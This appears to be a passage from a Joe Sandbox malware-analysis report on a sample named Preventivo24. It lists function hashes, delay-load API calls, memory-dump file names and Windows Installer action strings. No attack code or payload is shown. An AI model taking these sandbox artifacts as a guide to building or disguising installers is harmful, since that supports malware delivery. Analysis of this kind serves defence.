API String ID: 697777088-0
Opcode ID: 4d7c9fafc2b266c3f338320e3929d53a13d3cd127360715d71054dc435e1bf0c
Instruction ID: 1e45f748aafe3abc73a8a6ee89afdea0e5dc9f0142f2179d5d7b4a2fc28ca35a
Opcode Fuzzy Hash: 4d7c9fafc2b266c3f338320e3929d53a13d3cd127360715d71054dc435e1bf0c
Instruction Fuzzy Hash: E4B011A22AC282BEB30CF22A2E03E3A322CC0E0E20330C00FF8C0C0208EAC00C008032

Uniqueness

Uniqueness Score: -1.00%

Function 01087540 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0108752D

Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: ea20d2d41101c88ece527edb8a6a8826175219d7602f72d20c79d4361539333c
Instruction ID: ecdeed0d1df14efc72b1126ab94945de1026ecf661b751bea8e0c30d51fd433a
Opcode Fuzzy Hash: ea20d2d41101c88ece527edb8a6a8826175219d7602f72d20c79d4361539333c
Instruction Fuzzy Hash: 08B011B22AC082BEB30CF22E2E02E3A322CC0E0E20330C00FF8C0C0208EAC00C008032

Uniqueness

Uniqueness Score: -1.00%

Function 0108757C Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0108752D

Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 97520e22c05d2863793df0ee704fb10d6ac43a6e6527eb72c7711fde6dbd2e19
Instruction ID: c18ef33b7df9adfca1dbb4850f81cd5b8701f59edae65ae680952bd4c5d6183a
Opcode Fuzzy Hash: 97520e22c05d2863793df0ee704fb10d6ac43a6e6527eb72c7711fde6dbd2e19
Instruction Fuzzy Hash: 46B012A227C0416E720CF1151E02E3A312CD4D0D10330C00FF0C0C0104D5C00C404031

Uniqueness

Uniqueness Score: -1.00%

Function 01087586 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0108752D

Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 073384c391b7e64569b2bdfa01e0f240592affa063dc1c7bd50ac20a7fe5f3f9
Instruction ID: e677cbebd8a6fb9f7f8cd5d1ac0ff9422243998fabadb67f2d8d03eb45692543
Opcode Fuzzy Hash: 073384c391b7e64569b2bdfa01e0f240592affa063dc1c7bd50ac20a7fe5f3f9
Instruction Fuzzy Hash: 59B012A227C0816D724CF1151F02D3A312CC0D4D10330C00FF0C0C0104D5C10C414031

Uniqueness

Uniqueness Score: -1.00%

Function 010875C9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 010875B6

Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: bf5d343408547fd69951c0a59d2a0647e392ea57d13243e6c5c5877aace1c7ab
Instruction ID: 303d93b02914c87724be0ddf471c10f63b081f435d8e67617f2afd2413012e3b
Opcode Fuzzy Hash: bf5d343408547fd69951c0a59d2a0647e392ea57d13243e6c5c5877aace1c7ab
Instruction Fuzzy Hash: E7B0129229C1416E714CB21A2E03E3F711CC0D4D10330861EF4C0C0104D6C00C448131

Uniqueness

Uniqueness Score: -1.00%

Function 010875D3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 010875B6

Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 06ace2ee5e7090200fab72fa8e47acc9e8102d36cf5fd6715c5593270816b227
Instruction ID: c935e588d87fc4941a07f2c43f71aed19f3422d37ee0b2b4b98c04e0c4fa0790
Opcode Fuzzy Hash: 06ace2ee5e7090200fab72fa8e47acc9e8102d36cf5fd6715c5593270816b227
Instruction Fuzzy Hash: CAB0129229C0516E714CB1192F03E3F711CC0D4D10330811EF4C0C0104D6C10D058231

Uniqueness

Uniqueness Score: -1.00%

Function 010875FE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 010875F5

Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: bd55262bf317dd09994cce6f6ea1cad40fde7bedbad4914d7654f0923a022d84
Instruction ID: f6c2b174bee839a31ce9568761a9ff6e5ad4f473b536b003cff748a162f4b40f
Opcode Fuzzy Hash: bd55262bf317dd09994cce6f6ea1cad40fde7bedbad4914d7654f0923a022d84
Instruction Fuzzy Hash: 56B012D729C1C17D710CB1051E02D3E310CD0D0D20370C00EF4C0C0108D5C05C004031

Uniqueness

Uniqueness Score: -1.00%

Function 01087622 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 010875F5

Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 3bf14a25d767a7228129857cee27b3df414bfca03793b51c26dbb3e32ba6ee95
Instruction ID: 582b6af630e348cde7c27895fd026ef7e48178dc3499aae8e7d91bc285442a09
Opcode Fuzzy Hash: 3bf14a25d767a7228129857cee27b3df414bfca03793b51c26dbb3e32ba6ee95
Instruction Fuzzy Hash: E9B0129729C1C16D710CB1051E02D3E310CE0D0D20370800EF0C0C0108D6C05C004032

Uniqueness

Uniqueness Score: -1.00%

Function 0108765E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 010875F5

Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: c70155f2db78e14f22c68f2ad21979dc7aa1ade7d101dc637b294258c17444cb
Instruction ID: bda10eb72a2db8b430001cf97d709e58ef8f430a6823c33b88221e432b57c00a
Opcode Fuzzy Hash: c70155f2db78e14f22c68f2ad21979dc7aa1ade7d101dc637b294258c17444cb
Instruction Fuzzy Hash: 4AB0129729D2C16E710CB10A1E06D3F310CC0D0D20330850EF0C0C0108D9C01C804131

Uniqueness

Uniqueness Score: -1.00%

Function 01087654 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 010875F5

Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 2d7675de3917e10314eba1ab1ec8cded9d8e0d32ffa70bbed99735173df9b385
Instruction ID: 4184215116b537ed49cff56846e41bb864964390a8d3f86b435bcaba46564996
Opcode Fuzzy Hash: 2d7675de3917e10314eba1ab1ec8cded9d8e0d32ffa70bbed99735173df9b385
Instruction Fuzzy Hash: C6B012D729C1C1BE710CB1091E02D3F310CC0D0D20330C00EF4C0C0208DDC01C404131

Uniqueness

Uniqueness Score: -1.00%

Function 010876F5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 010876AE

Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: b3bdf7974cde06864a4121350649313ef4056dd3516072717b0c84e2b645f5e1
Instruction ID: 84e4794261ab045f18b7d0b13103d18b98dc812346accf666e990fd404a57ebc
Opcode Fuzzy Hash: b3bdf7974cde06864a4121350649313ef4056dd3516072717b0c84e2b645f5e1
Instruction Fuzzy Hash: 63B0129225C0216D304CB1195F02D3A710CC0D6D10330C00EF0C0D0104D5811C054071

Uniqueness

Uniqueness Score: -1.00%

Function 00E89CE0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?), ref: 00E89CEB

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: a407b3ec0339be8287e4a61ff876a465378e1f2ff9f8ba2e53f10f5cfbbb96f3
Instruction ID: ebc0266b0f94c96a557d5998334281165972f4851cfb8fe97ddb934c684e1d07
Opcode Fuzzy Hash: a407b3ec0339be8287e4a61ff876a465378e1f2ff9f8ba2e53f10f5cfbbb96f3
Instruction Fuzzy Hash: B8C08C306002104BD7306A18B608B82B2DC5F04700F044459A82ED3240CBB0D8408750

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00E83480 Relevance: 170.7, Strings: 134, Instructions: 3218COMMON

Download Yara Rule

Strings

InstallFiles, xrefs: 00E85F6F
UnpublishFeatures, xrefs: 00E83FA5
UnregisterExtensionInfo, xrefs: 00E84F08
RegisterMIMEInfo, xrefs: 00E8659B
WriteRegistryValues, xrefs: 00E8661E
AI_ProcessTasks, xrefs: 00E8764E
TypeLib, xrefs: 00E869E5
1500, xrefs: 00E852F2, 00E85438, 00E871FC, 00E87764
ProgId, xrefs: 00E850B4, 00E86544
DuplicateFile, xrefs: 00E8583D, 00E86261
AI_InstallPostPrerequisite, xrefs: 00E870E6
UnregisterComPlus, xrefs: 00E84377
RegisterTypeLibraries, xrefs: 00E869BF
AI_GxInstall, xrefs: 00E87266
10000, xrefs: 00E86CED, 00E878E4
SelfUnregModules, xrefs: 00E844BD
AI_Game, xrefs: 00E8728C, 00E87480
UnregisterClassInfo, xrefs: 00E84DA7
120000, xrefs: 00E8557E
PublishFeatures, xrefs: 00E86DDD
File, xrefs: 00E838A3, 00E85983, 00E85FD5
Component_, xrefs: 00E83EF8, 00E84184, 00E842CA, 00E84410, 00E846C1, 00E847E2, 00E84928, 00E84BBE, 00E84CFA, 00E85358, 00E8549E, 00E855E4, 00E8575E, 00E85870, 00E859B6, 00E85C5B, 00E85D7C, 00E85EC2, 00E86008, 00E86294, 00E863D7, 00E86657, 00E866DD, 00E86763, 00E86866, 00E868EC, 00E86972, 00E869F8, 00E86AFB, 00E86B81, 00E86C02, 00E86C8D, 00E86D13
Extension, xrefs: 00E84F53, 00E864C7
RemoveODBC, xrefs: 00E84603, 00E84749, 00E8488F
Font, xrefs: 00E84A3B, 00E867D6
5000, xrefs: 00E86334
FileCost, xrefs: 00E8383D
InstallInitialize, xrefs: 00E86E5A
CostFinalize, xrefs: 00E83988
PublishComponent, xrefs: 00E83EC5, 00E86D00
WriteIniValues, xrefs: 00E866A4
RemoveExistingProducts, xrefs: 00E834A4
RegisterComPlus, xrefs: 00E86AC2
RegisterClassInfo, xrefs: 00E86424
RemoveIniFile, xrefs: 00E85325
PublishComponents, xrefs: 00E86CDA
20000, xrefs: 00E86C67
RemoveDuplicateFiles, xrefs: 00E857D7
DuplicateFiles, xrefs: 00E861FB
1500000, xrefs: 00E86B5B
InstallODBC, xrefs: 00E8682D, 00E868B3, 00E86939
AI_ScheduledTasks, xrefs: 00E87674
BindImage, xrefs: 00E86321, 00E86347
AI_AppSearchEx, xrefs: 00E874D7, 00E874FD
ODBCTranslator, xrefs: 00E847AF, 00E868D9
StartServices, xrefs: 00E86C54
UnregisterFonts, xrefs: 00E849D5
AI_XmlInstall, xrefs: 00E8716C, 00E871E9
UnregisterMIMEInfo, xrefs: 00E85179
AI_XmlElement, xrefs: 00E87192, 00E876F1
MsiPublishAssemblies, xrefs: 00E86D5B
RemoveShortcuts, xrefs: 00E8554B
AI_CountRowAction, xrefs: 00E87854
100000, xrefs: 00E86EEA
InstallServices, xrefs: 00E86B48
RegisterProgIdInfo, xrefs: 00E8651E
RemoveFolders, xrefs: 00E85B9D
RemoveEnvironmentStrings, xrefs: 00E85691
CostInitialize, xrefs: 00E83703
~, xrefs: 00E870CA
AI_UninstallAccounts, xrefs: 00E872E3
500, xrefs: 00E874E5
AI_UserGroups, xrefs: 00E87386, 00E8757A
RemoveIniValues, xrefs: 00E852BF, 00E85405
WriteEnvironmentStrings, xrefs: 00E8672A
2000, xrefs: 00E835FC, 00E87279, 00E872F6, 00E87373, 00E873F0, 00E87567, 00E875E4, 00E87661
ProcessComponents, xrefs: 00E83BEB
MIME, xrefs: 00E851DF, 00E865C1
RemoveFile, xrefs: 00E85AC9
Feature_, xrefs: 00E83D8B, 00E84F86, 00E864D8, 00E86D97, 00E86F8D, 00E87013, 00E87099, 00E87133
AI_ProcessGroups, xrefs: 00E87554
StopServices, xrefs: 00E840EB, 00E84231
AppSearch, xrefs: 00E835C9, 00E8364A
CreateFolder, xrefs: 00E85C03, 00E85D49
AI_XmlAttribute, xrefs: 00E8720F, 00E87777
ServiceControl, xrefs: 00E84151, 00E84297, 00E86C7A
ODBCDriver, xrefs: 00E848F5, 00E8695F
ServiceInstall, xrefs: 00E86B6E
AI_GxUninstall, xrefs: 00E8745A
